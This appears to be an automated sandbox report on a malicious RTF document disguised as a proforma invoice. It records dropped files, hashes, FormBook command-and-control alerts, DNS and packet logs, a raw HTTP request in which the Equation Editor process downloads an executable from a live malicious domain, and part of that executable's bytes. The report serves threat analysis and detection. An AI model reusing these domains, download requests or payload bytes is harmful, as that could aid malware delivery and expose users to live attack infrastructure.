                                                          Preview: `.?.+.^.%.'...'.#.>./.*.#.2.`.].2.+.3.%.6.=.?.3.2...%.8.?.?.,.-.#.6.+.1.].8.%.(.9.9...~.6.4./.!.4.?.|.*.'.#.?.?...).%.8./.6.5.#.$...!.(.[...^.%.~.?.?.^.?.~.,.?.,.%.?.%.@.?./.^.8.0.@.9...(...6.8.4.:.;.<.,.../.7.?.@.%.-.,.].].#...~.).2...2.7...*.<.(.^.1.!._.%.[.).`.1.:.%.,.!.#.[...?.4.<.?.0.>.$.&.*.3.8.5.;.2./.4.'.`.5._.!.?.2.).%.=.<.].[.7.&...).!.%...9.,.7.+.&.`.8.=.|.=.9./.=...'.>.$.?.2.>.1.*.2.[.?.).*.<.`._.-.<.*...^.^...+.3.%.7.`.[.3.<.?.~.].%.!.%...?.1.1.@.;.8.....9.?.[.;./.+.=...>.....~.%.7.8.:.0.8...|.6.+.8.^.4.:.>.8./.(.9.7.5.!.3.&...6.^.?.*.%.(.?.:.@.%.-.%./...+.6.9.+.-.:.&.!.~.?._.|.5.9.^.8.)...@.9...<.%._...?...8.%.$...=.[.2.:.~.%.:...[./.?./.].7.9.-.9.8.?.2.1.!.[._.~.%.&.?...#.).#.!.?.7.,.`.....7.[.?.`.:...(...1.6.6.4.:...?.<.=.%.8.@.~.-.%.=.%.?././.9.$.%.;.*...%.<.<.[.0.5.#.1.;.1.[.,.8.8.].0.?.7./.?.9.?.%.=.>.5...?.0.1.,.2.%.).@.|.1.*.8...4.+.9.6.[.0.&.?.[.*.?.8.).5.1.?.^.:.(.%.7...?.~.?.9.=.+.?.7.2.$.!.-.&.;.=...1.'.!.<.1...6.4.8.:.?.%.$.=.1.3...$.'.(.%...%.?.?.&.%.-.`.3.6.
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D3778CDA-961A-4F4E-A09E-6641E3AF482B}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1024
                                                          Entropy (8bit):0.05390218305374581
                                                          Encrypted:false
                                                          SSDEEP:3:ol3lYdn:4Wn
                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                          Malicious:false
                                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Proforma invoice.LNK
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:54 2021, mtime=Mon Aug 30 20:08:54 2021, atime=Mon Sep 27 20:25:14 2021, length=13744, window=hide
                                                          Category:dropped
                                                          Size (bytes):2088
                                                          Entropy (8bit):4.553828665912094
                                                          Encrypted:false
                                                          SSDEEP:48:8zS/XTA+EfBhwngWf2zS/XTA+EfBhwngWB:8zS/XM5pKngWf2zS/XM5pKngWB
                                                          MD5:B03AE4A9AFDA83073AB38FF9347448F6
                                                          SHA1:E19CEDB159388A7A8544C1B6896AE988279A50ED
                                                          SHA-256:3D9C60CBB7C71F649C0A92C44E761E26AD771E5C0097C33904DE89542819E403
                                                          SHA-512:380A28DBE05DB31FCA1A761132E1F636E4A74FF01B5FBDE8E7DB5A8758CBCA1151017898014358272D1A0ADB077454885AA90788DF5C706985ED63E281FB3A33
                                                          Malicious:false
                                                          Preview: L..................F.... ...\..=...\..=...7..(....5...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S .*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2..5..;S(. .PROFOR~1.DOC..V.......S...S..*.........................P.r.o.f.o.r.m.a. .i.n.v.o.i.c.e...d.o.c.......~...............-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop\Proforma invoice.doc.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.r.o.f.o.r.m.a. .i.n.v.o.i.c.e...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_....3N...W...9..g.....
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):86
                                                          Entropy (8bit):4.3742805190362475
                                                          Encrypted:false
                                                          SSDEEP:3:M1dYMoLZ6ltaQoLZ6lmX1dYMoLZ6lv:MwWa/Gi
                                                          MD5:970EE8C020A44415D691F6A5824634D0
                                                          SHA1:CB66267AAE4C8492460159DA1209E6EEF80E7213
                                                          SHA-256:27FDC724783770E075ED233D852CAAC5E8619A0FDEA23AF1FFECAB42385A61D5
                                                          SHA-512:D09674ACDEAE33413310D7A49F141C769BD42C061FFD143CFAD1DD52090F8BF80AEB5565076815EF5ADDAC8D319844BC119D51959B0D4685F6AA1BF74EF6E1D9
                                                          Malicious:false
                                                          Preview: [doc]..Proforma invoice.LNK=0..Proforma invoice.LNK=0..[doc]..Proforma invoice.LNK=0..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.5038355507075254
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                          Malicious:false
                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                          C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):863744
                                                          Entropy (8bit):6.787269024335101
                                                          Encrypted:false
                                                          SSDEEP:12288:b3Q2cI8GAKaohwnRZHDA7Mg+SvqwpCR9KDfagVeZ3yYxNEi09I/pRYh7pzWjNhc/:GdIF9YPUu0RPDsu/eE/LQzKhF+va+G
                                                          MD5:7572FBC5DE30359E833D6F382DB286FA
                                                          SHA1:24B8DF7EF119A0282F39A4F8F589DAFC64E1D28C
                                                          SHA-256:1758A9B18032CE82F4E95249413EE1A8CBADE1EF2CB773BC958502801F3AF738
                                                          SHA-512:6F5388CF81CE66DA16F93CB61487F016AE230FBA357C961B36EDAB324DD31A54CD239CA1B74214DA4CD2754AFA686BA10CF82F30339E0712E9173A2EF1ED141E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 13%
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0.............f.... ........@.. ....................................@.....................................O.......T....................`....................................................... ............... ..H............text...l.... ...................... ..`.rsrc...T...........................@..@.reloc.......`.......,..............@..B................H.......H............S............................................................{#...*:.($.....}#...*..0..$........u......,.(%....{#....{#...o&...+..*v ..l. )UU.Z(%....{#...o'...X*...0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*..{+...*V.($.....}*.....}+...*..0..<........u......,0(%....{*....{*...o&...,.(,....{+....{+...o-...+..*. .pi| )UU.Z(%....{*...o'...X )UU.Z(,....{+...o....X*....0...........r%..p......%..{*...................
                                                          C:\Users\user\Desktop\~$oforma invoice.doc
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.5038355507075254
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                          Malicious:false
                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                          Static File Info

                                                          General

                                                          File type:Rich Text Format data, unknown version
                                                          Entropy (8bit):3.6680664268152143
                                                          TrID:
                                                          • Rich Text Format (5005/1) 55.56%
                                                          • Rich Text Format (4004/1) 44.44%
                                                          File name:Proforma invoice.doc
                                                          File size:13744
                                                          MD5:5be61511dab1f4f76366f52ca8fec8b1
                                                          SHA1:70a6dd35d6da873242e3c56ff86f000c78614a1f
                                                          SHA256:443ffe0efb43ac5c04e23e749b2908a8e723462f409208e0f4cf35046e3b129d
                                                          SHA512:bd63c51ff9033fd445445dde368b8c2753b82dce3f109125ce7045c67f6834b445e70c23d8c0ab0f6e13bf3588123e22ebbdc6001da8e58e8422188dcb49343e
                                                          SSDEEP:384:ykwSR+sQLj8h1zCyR487af6DobD/UKD+SxBqV4Y:qRo/Hs6sbDmSxWh
                                                          File Content Preview:{\rtf8672`?+^%'.'#>/*#2`]2+3%6=?32.%8??,-#6+1]8%(99.~64/!4?|*'#??.)%8/65#$.!([.^%~??^?~,?,%?%@?/^80@9.(.684:;<,./7?@%-,]]#.~)2.27.*<(^1!_%[)`1:%,!#[.?4<?0>$&*385;2/4'`5_!?2)%=<][7&.)!%.9,7+&`8=|=9/=.'>$?2>1*2[?)*<`_-<*.^^.+3%7`[3<?~]%!%.?11@;8..9?[;/+=.>.

                                                          File Icon

                                                          Icon Hash:e4eea2aaa4b4b4a4

                                                          Static RTF Info

                                                          Objects

                                                          IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                          0000005BBhno
                                                          100000572hno

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          09/27/21-14:27:07.928693ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                          09/27/21-14:27:22.379726TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.2234.98.99.30
                                                          09/27/21-14:27:22.379726TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.2234.98.99.30
                                                          09/27/21-14:27:22.379726TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.2234.98.99.30
                                                          09/27/21-14:27:22.497193TCP1201ATTACK-RESPONSES 403 Forbidden804916634.98.99.30192.168.2.22
                                                          09/27/21-14:27:43.013999TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2235.246.6.109
                                                          09/27/21-14:27:43.013999TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2235.246.6.109
                                                          09/27/21-14:27:43.013999TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2235.246.6.109

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 27, 2021 14:25:37.811347008 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.835999966 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.836101055 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.836704969 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.860897064 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.862483978 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.862552881 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.862603903 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.862636089 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.862668991 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.862709045 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.862740040 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.862746954 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.862765074 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.862768888 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.862771988 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.862775087 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.862777948 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.862802029 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.862831116 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.862849951 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.862869978 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.862884998 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.862907887 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.862930059 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.875570059 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888159037 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888202906 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888226032 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888242960 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888247967 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888269901 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888271093 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888273954 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888305902 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888329029 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888370037 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888377905 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888416052 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888461113 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888508081 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888565063 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888614893 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888628960 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888638020 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888655901 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888659954 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888673067 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888679981 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888693094 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888710022 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888771057 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888817072 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888864040 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888911963 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888922930 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.888964891 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.888973951 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.889014959 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.889025927 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.889056921 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.889091969 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.889096975 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.889131069 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.889152050 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.889195919 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.890089989 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914339066 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914378881 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914400101 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914422989 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914426088 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914444923 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914469004 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914491892 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914491892 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914509058 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914513111 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914514065 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914516926 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914536953 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914539099 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914561033 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914561987 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914582014 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914583921 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914606094 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914608955 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914628029 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914629936 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914652109 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914653063 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914674044 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914674997 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914696932 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914699078 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914719105 CEST8049165185.239.243.112192.168.2.22
                                                          Sep 27, 2021 14:25:37.914724112 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914751053 CEST4916580192.168.2.22185.239.243.112
                                                          Sep 27, 2021 14:25:37.914766073 CEST8049165185.239.243.112192.168.2.22

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 27, 2021 14:25:37.776082039 CEST5216753192.168.2.228.8.8.8
                                                          Sep 27, 2021 14:25:37.789975882 CEST53521678.8.8.8192.168.2.22
                                                          Sep 27, 2021 14:27:04.841928005 CEST5059153192.168.2.228.8.8.8
                                                          Sep 27, 2021 14:27:05.855655909 CEST5059153192.168.2.228.8.8.8
                                                          Sep 27, 2021 14:27:06.170541048 CEST53505918.8.8.8192.168.2.22
                                                          Sep 27, 2021 14:27:07.928388119 CEST53505918.8.8.8192.168.2.22
                                                          Sep 27, 2021 14:27:22.331332922 CEST5780553192.168.2.228.8.8.8
                                                          Sep 27, 2021 14:27:22.360308886 CEST53578058.8.8.8192.168.2.22
                                                          Sep 27, 2021 14:27:42.927699089 CEST5903053192.168.2.228.8.8.8
                                                          Sep 27, 2021 14:27:42.981733084 CEST53590308.8.8.8192.168.2.22

                                                          ICMP Packets

                                                          TimestampSource IPDest IPChecksumCodeType
                                                          Sep 27, 2021 14:27:07.928693056 CEST192.168.2.228.8.8.8d046(Port unreachable)Destination Unreachable

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Sep 27, 2021 14:25:37.776082039 CEST192.168.2.228.8.8.80x17dfStandard query (0)fantecheo.tkA (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:27:04.841928005 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.urbantennis.infoA (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:27:05.855655909 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.urbantennis.infoA (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:27:22.331332922 CEST192.168.2.228.8.8.80xfc43Standard query (0)www.lazyguysmarketing.comA (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:27:42.927699089 CEST192.168.2.228.8.8.80x9c63Standard query (0)www.visionandcourage.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Sep 27, 2021 14:25:37.789975882 CEST8.8.8.8192.168.2.220x17dfNo error (0)fantecheo.tk185.239.243.112A (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:27:06.170541048 CEST8.8.8.8192.168.2.220xc18cName error (3)www.urbantennis.infononenoneA (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:27:07.928388119 CEST8.8.8.8192.168.2.220xc18cName error (3)www.urbantennis.infononenoneA (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:27:22.360308886 CEST8.8.8.8192.168.2.220xfc43No error (0)www.lazyguysmarketing.comlazyguysmarketing.comCNAME (Canonical name)IN (0x0001)
                                                          Sep 27, 2021 14:27:22.360308886 CEST8.8.8.8192.168.2.220xfc43No error (0)lazyguysmarketing.com34.98.99.30A (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:27:42.981733084 CEST8.8.8.8192.168.2.220x9c63No error (0)www.visionandcourage.comwww193.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Sep 27, 2021 14:27:42.981733084 CEST8.8.8.8192.168.2.220x9c63No error (0)www193.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Sep 27, 2021 14:27:42.981733084 CEST8.8.8.8192.168.2.220x9c63No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Sep 27, 2021 14:27:42.981733084 CEST8.8.8.8192.168.2.220x9c63No error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Sep 27, 2021 14:27:42.981733084 CEST8.8.8.8192.168.2.220x9c63No error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • fantecheo.tk
                                                          • www.lazyguysmarketing.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.2249165185.239.243.11280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          TimestampkBytes transferredDirectionData
                                                          Sep 27, 2021 14:25:37.836704969 CEST0OUTGET /ibefrankzx.exe HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                          Host: fantecheo.tk
                                                          Connection: Keep-Alive
                                                          Sep 27, 2021 14:25:37.862483978 CEST2INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Mon, 27 Sep 2021 12:25:37 GMT
                                                          Content-Type: application/x-msdownload
                                                          Content-Length: 863744
                                                          Last-Modified: Mon, 27 Sep 2021 01:39:56 GMT
                                                          Connection: keep-alive
                                                          ETag: "615120ec-d2e00"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ae 13 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 94 0b 00 00 98 01 00 00 00 00 00 66 b3 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 b3 0b 00 4f 00 00 00 00 c0 0b 00 54 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c 93 0b 00 00 20 00 00 00 94 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 54 94 01 00 00 c0 0b 00 00 96 01 00 00 96 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0d 00 00 02 00 00 00 2c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 b3 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 cc 01 00 14 53 02 00 03 00 00 00 8c 02 00 06 fc 1f 04 00 18 93 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 23 00 00 0a 2a 3a 02 28 24 00 00 0a 02 03 7d 23 00 00 0a 2a 00 13 30 03 00 24 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 06 2c 18 28 25 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 26 00 00 0a 2b 01 16 2a 76 20 8b e7 6c c3 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 23 00 00 0a 6f 27 00 00 0a 58 2a 00 00 13 30 07 00 4d 00 00 00 02 00 00 11 14 72 01 00 00 70 17 8d 17 00 00 01 25 16 02 7b 23 00 00 0a 0a 12 00 12 01 fe 15 03 00 00 1b 07 8c 03 00 00 1b 2d 14 71 03 00 00 1b 0b 12 01 